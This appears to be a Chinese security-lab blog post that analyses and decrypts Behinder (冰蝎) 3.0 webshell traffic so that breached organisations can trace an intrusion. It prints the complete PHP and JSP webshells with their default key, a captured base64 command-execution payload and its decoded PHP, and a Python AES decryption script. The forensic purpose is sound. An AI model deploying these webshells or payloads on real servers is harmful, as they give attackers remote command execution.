专栏首页黑伞攻防实验室冰蝎3.0流量分析与还原

冰蝎3.0流量分析与还原

希望这篇文章可以真正帮助那些被打穿的单位识别与溯源。

phpshell

与冰蝎2.0在建立连接时随机生成AES密钥同时明文交换不同是,冰蝎3.0的AES密钥为连接密码32位md5值的前16位,默认连接密码rebeyond。该方法保证了全密文传输,但是依然具有一定的特点。

特征:连接content-length =5464or 5484(占比较多) 基于AES加密和base64编码,解密时通过对shell.php内容的截获获取密钥,具体操作如下所示:

以下为冰蝎3.0webshell

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

捕获流量如下图:

开始还原流量: 这时候的应急时也要首先获取到webshell的文件,通过提取文件中的key 也就是该密钥为连接密码32位md5值的前16位 作为我们AES的解密密钥

assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY3Rpb24gZ2V0U2FmZVN0cigkc3RyKXsNCiAgICAkczEgPSBpY29udigndXRmLTgnLCdnYmsvL0lHTk9SRScsJHN0cik7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgaWYoJHMwID09ICRzdHIpew0KICAgICAgICByZXR1cm4gJHMwOw0KICAgIH1lbHNlew0KICAgICAgICByZXR1cm4gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzdHIpOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4oJGNtZCkNCnsNCiAgICBAc2V0X3RpbWVfbGltaXQoMCk7DQogICAgQGlnbm9yZV91c2VyX2Fib3J0KDEpOw0KICAgIEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsNCiAgICAkUGFkdEpuID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7DQogICAgaWYgKCEgZW1wdHkoJFBhZHRKbikpIHsNCiAgICAgICAgJFBhZHRKbiA9IHByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBleHBsb2RlKCcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBhcnJheV9tYXAoJ3RyaW0nLCAkUGFkdEpuKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkUGFkdEpuID0gYXJyYXkoKTsNCiAgICB9DQogICAgJGMgPSAkY21kOw0KICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicpKSB7DQogICAgICAgICRjID0gJGMgLiAiIDI+JjFcbiI7DQogICAgfQ0KICAgICRKdWVRREJIID0gJ2lzX2NhbGxhYmxlJzsNCiAgICAkQnZjZSA9ICdpbl9hcnJheSc7DQogICAgaWYgKCRKdWVRREJIKCdzeXN0ZW0nKSBhbmQgISAkQnZjZSgnc3lzdGVtJywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgc3lzdGVtKCRjKTsNCiAgICAgICAgJGtXSlcgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgICAgb2JfZW5kX2NsZWFuKCk7DQogICAgfSBlbHNlIGlmICgkSnVlUURCSCgncHJvY19vcGVuJykgYW5kICEgJEJ2Y2UoJ3Byb2Nfb3BlbicsICRQYWR0Sm4pKSB7DQogICAgICAgICRoYW5kbGUgPSBwcm9jX29wZW4oJGMsIGFycmF5KA0KICAgICAgICAgICAgYXJyYXkoDQogICAgICAgICAgICAgICAgJ3BpcGUnLA0KICAgICAgICAgICAgICAgICdyJw0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgIGFycmF5KA0KICAgICAgICAgICAgICAgICdwaXBlJywNCiAgICAgICAgICAgICAgICAndycNCiAgICAgICAgICAgICksDQogICAgICAgICAgICBhcnJheSgNCiAgICAgICAgICAgICAgICAncGlwZScsDQogICAgICAgICAgICAgICAgJ3cnDQogICAgICAgICAgICApDQogICAgICAgICksICRwaXBlcyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgd2hpbGUgKCEgZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICAgICAgICAka1dKVyAuPSBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KICAgICAgICB9DQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ3Bhc3N0aHJ1JykgYW5kICEgJEJ2Y2UoJ3Bhc3N0aHJ1JywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgcGFzc3RocnUoJGMpOw0KICAgICAgICAka1dKVyA9IG9iX2dldF9jb250ZW50cygpOw0KICAgICAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdzaGVsbF9leGVjJykgYW5kICEgJEJ2Y2UoJ3NoZWxsX2V4ZWMnLCAkUGFkdEpuKSkgew0KICAgICAgICAka1dKVyA9IHNoZWxsX2V4ZWMoJGMpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ2V4ZWMnKSBhbmQgISAkQnZjZSgnZXhlYycsICRQYWR0Sm4pKSB7DQogICAgICAgICRrV0pXID0gYXJyYXkoKTsNCiAgICAgICAgZXhlYygkYywgJGtXSlcpOw0KICAgICAgICAka1dKVyA9IGpvaW4oY2hyKDEwKSwgJGtXSlcpIC4gY2hyKDEwKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdleGVjJykgYW5kICEgJEJ2Y2UoJ3BvcGVuJywgJFBhZHRKbikpIHsNCiAgICAgICAgJGZwID0gcG9wZW4oJGMsICdyJyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgaWYgKGlzX3Jlc291cmNlKCRmcCkpIHsNCiAgICAgICAgICAgIHdoaWxlICghIGZlb2YoJGZwKSkgew0KICAgICAgICAgICAgICAgICRrV0pXIC49IGZyZWFkKCRmcCwgMTAyNCk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgQHBjbG9zZSgkZnApOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRrV0pXID0gMDsNCiAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJmYWlsIik7DQogICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgibm9uZSBvZiBwcm9jX29wZW4vcGFzc3RocnUvc2hlbGxfZXhlYy9leGVjL2V4ZWMgaXMgYXZhaWxhYmxlIik7DQogICAgICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsNCiAgICAgICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCAka2V5KTsNCiAgICAgICAgcmV0dXJuOw0KICAgICAgICANCiAgICB9DQogICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKGdldFNhZmVTdHIoJGtXSlcpKTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICAkX1NFU1NJT05bJ2snXSk7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJGRhdGEsJGtleSkNCnsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQ0KICAgIAl7DQogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsNCiAgICAJCQkgJGRhdGFbJGldID0gJGRhdGFbJGldXiRrZXlbJGkrMSYxNV07IA0KICAgIAkJCX0NCgkJCXJldHVybiAkZGF0YTsNCiAgICAJfQ0KICAgIGVsc2UNCiAgICAJew0KICAgIAkJcmV0dXJuIG9wZW5zc2xfZW5jcnlwdCgkZGF0YSwgIkFFUzEyOCIsICRrZXkpOw0KICAgIAl9DQp9JGNtZD0ibHMiOw0KbWFpbigkY21kKTs='));

再对其中base编码的数据进行解码 内容如下:

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$cmd="ls";
main($cmd);

可以看到请求的内容为执行了ls命令

响应内容解密雷同

并附上github师傅们的解密脚本 目前只支持php https://github.com/melody27/behinder_decrypt

jspshell

jspwebshell 相对来说也不是很复杂 先po一下

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

也要首先获取到webshell的文件,通过提取文件中的key 也就是该密钥为连接密码32位md5值的前16位 作为我们AES的解密密钥

请求包解密代码:

#coding:utf-8
import base64
from Crypto.Cipher import AES  
import binascii
import json   #注:python3 安装 Crypto 是 pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pycryptodome<br><br>
#解密
def aes_decode(data, key):
    try:
        aes = AES.new(str.encode(key), AES.MODE_ECB)  # 初始化加密器
        decrypted_text = aes.decrypt(data)  # 解密
        decrypted_text = decrypted_text[:-(decrypted_text[-1])]  
    except Exception as e:
        print(e)
    return decrypted_text
 

 
if __name__ == '__main__':
    key = 'e45e329feb5d925b'  # 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256
    data="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